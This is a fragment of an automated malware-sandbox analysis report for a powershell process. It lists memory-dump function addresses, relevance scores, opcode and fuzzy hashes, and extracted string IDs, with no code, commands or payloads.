                                                                                                                                                                                                                                                              • Opcode ID: 1053690d916ef43b59072c9715caebf78447019a12a27f144ec2819fcb25a15c
                                                                                                                                                                                                                                                              • Instruction ID: 0f3db51c8c6c7ff120edc5012451faa208b9e1c348cf94b49b1ec71c464b99bf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1053690d916ef43b59072c9715caebf78447019a12a27f144ec2819fcb25a15c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5416AB4A001058FCB0ACF59C1989AEFBB1FF88310B218569D915AB364C736FD51CFA0
                                                                                                                                                                                                                                                              Function 04D44900 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1922065981.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_4d40000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7862f8bdb4f31b059df2b15a739b09ce71a3b700962172da30273dc2deaf74cb
                                                                                                                                                                                                                                                              • Instruction ID: cc0351685c9cea2627d9a98d7596242fe7b407a25058feefcbc0f0f98dec2c63
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7862f8bdb4f31b059df2b15a739b09ce71a3b700962172da30273dc2deaf74cb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3317374A093958FCB02DF6CD8909AABFF4AF4A210B1581EBD494DB353C634EC45CBA5
                                                                                                                                                                                                                                                              Function 04D42AA0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1922065981.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_4d40000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7eb3fac976feda6073c92ee8aae999be64b8b3ecc354b75f5dd95a6a4f01b703
                                                                                                                                                                                                                                                              • Instruction ID: 5934b753675880e679490782cf05baed7f013f6a625d5dabd6fea7757a2f56d0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7eb3fac976feda6073c92ee8aae999be64b8b3ecc354b75f5dd95a6a4f01b703
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49212AB4A002159FCB00CF59C8809AAFBB1FF8D310B148595E449EB365C735FC41CBA0
                                                                                                                                                                                                                                                              Function 04D42A90 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1922065981.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_4d40000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b515e3c9b93e8633a70f7b3857bcd52ca68a87f1914cfdb1a2aa9248ced7f77b
                                                                                                                                                                                                                                                              • Instruction ID: b751896acf3795079ad623990e18c5a43a76c8000f70ce19c88df50558eb6f2e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b515e3c9b93e8633a70f7b3857bcd52ca68a87f1914cfdb1a2aa9248ced7f77b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F021D4B4A006159FCB04CF49C9849AAFBF1FF88310B1485A9E859EB765C735EC91CBA0
                                                                                                                                                                                                                                                              Function 04D448F0 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1922065981.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_4d40000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: bf8592e5ed84fb9fc9e5da46f764dba5db1a1e3f481d0e232130d28136883ae6
                                                                                                                                                                                                                                                              • Instruction ID: 047d976a51c723d6d095d69a117c3dd6dec7a48823ddd32f62440ea21ada5ab6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf8592e5ed84fb9fc9e5da46f764dba5db1a1e3f481d0e232130d28136883ae6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C212C74A052498FCB04CF98C5809AEFBF5FF89310B148599D959AB356C731ED41CBA1
                                                                                                                                                                                                                                                              Function 0344D006 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1921491385.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_344d000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4c0a5e6dc24a97014ee677ed5f77fb49e9ca0a73d1de0839abc063551b04842c
                                                                                                                                                                                                                                                              • Instruction ID: 46ad6e625986efb517d7a2653a396f4ad85256d591a78c5bef8def404ddb4ce9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c0a5e6dc24a97014ee677ed5f77fb49e9ca0a73d1de0839abc063551b04842c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B01407140E3C09FE7128B25C894B52BFB4EF53224F1D80DBD9888F2A7C2699844C772
                                                                                                                                                                                                                                                              Function 0344D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1921491385.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_344d000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7d47d3ea2c0da7301d3813689a940ec3c18fc5843a847f98fa6e65c018bcca4a
                                                                                                                                                                                                                                                              • Instruction ID: 342bd71cfabc26b1ee7b6ea165e6c4ad3bfd22706459113596967cd40259d207
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d47d3ea2c0da7301d3813689a940ec3c18fc5843a847f98fa6e65c018bcca4a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E01DF318093409AF7108A2ACD84B67BF98EF42368F0CC57BED180F247C6799842C6B5

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 07C108A0 Relevance: 12.8, Strings: 10, Instructions: 318COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'kq$4'kq$tPkq$tPkq$#j$$kq$$kq$$kq$k$k
                                                                                                                                                                                                                                                              • API String ID: 0-1624373896
                                                                                                                                                                                                                                                              • Opcode ID: 21421d2391e82766c55385d13c0d3ea914e1357c8438421b973c32429509d62b
                                                                                                                                                                                                                                                              • Instruction ID: 77c1fc386435b8fddcd1b8f1dfd90e375440e668f331df1072525d8c0d083e1c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21421d2391e82766c55385d13c0d3ea914e1357c8438421b973c32429509d62b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06A16DB27043568FD7259A79941066BBFE5AFC3210F2880BBD845CB392DA36CDC5D3A1
                                                                                                                                                                                                                                                              Function 07C13D70 Relevance: 9.2, Strings: 7, Instructions: 434COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$d5j
                                                                                                                                                                                                                                                              • API String ID: 0-1325674129
                                                                                                                                                                                                                                                              • Opcode ID: 0a75e24293c96d488c386691410f54c8e7f94b4a9ac21f76c5920e7bc4812360
                                                                                                                                                                                                                                                              • Instruction ID: c2e3520d3d92cdbd8e2b5c828ede130574ad16404b14a80261628d98a9cd566b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a75e24293c96d488c386691410f54c8e7f94b4a9ac21f76c5920e7bc4812360
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58E149B1B04296CFCB289B69D8406AABBF2AFC7354F24C0BAD405CB355DB35CA41D791
                                                                                                                                                                                                                                                              Function 07C114E8 Relevance: 8.9, Strings: 7, Instructions: 186COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'kq$4'kq$$kq$$kq$$kq$k$k
                                                                                                                                                                                                                                                              • API String ID: 0-4149185237
                                                                                                                                                                                                                                                              • Opcode ID: 40ca03cb9c23c0c3e61e7b49565527807b7c3a3c13c784137de2729772241cb4
                                                                                                                                                                                                                                                              • Instruction ID: faf4b9e8b8832382b6cfd9a87db4ccb8ce1d3d9290467ad3ae9f21d94df9baff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40ca03cb9c23c0c3e61e7b49565527807b7c3a3c13c784137de2729772241cb4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 405138B1B0434A8FC7259A6E941036BBBB6EFC3250F2C807BD606C7291DA3EC941D761
                                                                                                                                                                                                                                                              Function 07C13640 Relevance: 8.0, Strings: 6, Instructions: 494COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'kq$4'kq$4'kq$4'kq$tPkq$tPkq
                                                                                                                                                                                                                                                              • API String ID: 0-2225000908
                                                                                                                                                                                                                                                              • Opcode ID: ec48825ff31a7fa0394d23dc58cd3ba7a98f2080a781f89044b7b010cce8c1d4
                                                                                                                                                                                                                                                              • Instruction ID: 953a0546e0fdc956e156504d3475def84153fdca75ed2ae9964de2f8c6a81269
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec48825ff31a7fa0394d23dc58cd3ba7a98f2080a781f89044b7b010cce8c1d4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F179B27043868FD7159B69985066ABBA6AFC3214F1480BBC905CF391EB36CD45C7E1
                                                                                                                                                                                                                                                              Function 07C13518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $kq$$kq$$kq$$kq
                                                                                                                                                                                                                                                              • API String ID: 0-2881790790
                                                                                                                                                                                                                                                              • Opcode ID: 7f6a2e4ce3ee4eb764c35fc97e6a0bd745c2e2b7f8817a9835c21563601ad4fd
                                                                                                                                                                                                                                                              • Instruction ID: 0ed85fb54461d32e98afb6a6c4c7fe084692e0fcba9935b9548bf1c069af151c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f6a2e4ce3ee4eb764c35fc97e6a0bd745c2e2b7f8817a9835c21563601ad4fd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4621ADB13103865BDB34656E9C60727BFDB5BC2B18F24843AA505CB381DD3AD9409370
                                                                                                                                                                                                                                                              Function 07C10571 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1932726383.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7c10000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'kq$4'kq$$kq$$kq
                                                                                                                                                                                                                                                              • API String ID: 0-1727931526
                                                                                                                                                                                                                                                              • Opcode ID: f86a7053be97633b5c867f5ba4c1d5b0ecec7ce02b6c4d39430fa26a08d72709
                                                                                                                                                                                                                                                              • Instruction ID: 299f04234596ef6dfb7b636d85d344812e371278c70bca3949cc57a53e3bc4b1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f86a7053be97633b5c867f5ba4c1d5b0ecec7ce02b6c4d39430fa26a08d72709
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 080147A170A3C54FC33A122818302626FB75FD3550B2900BBC041CF2A7DD1D8CC683AB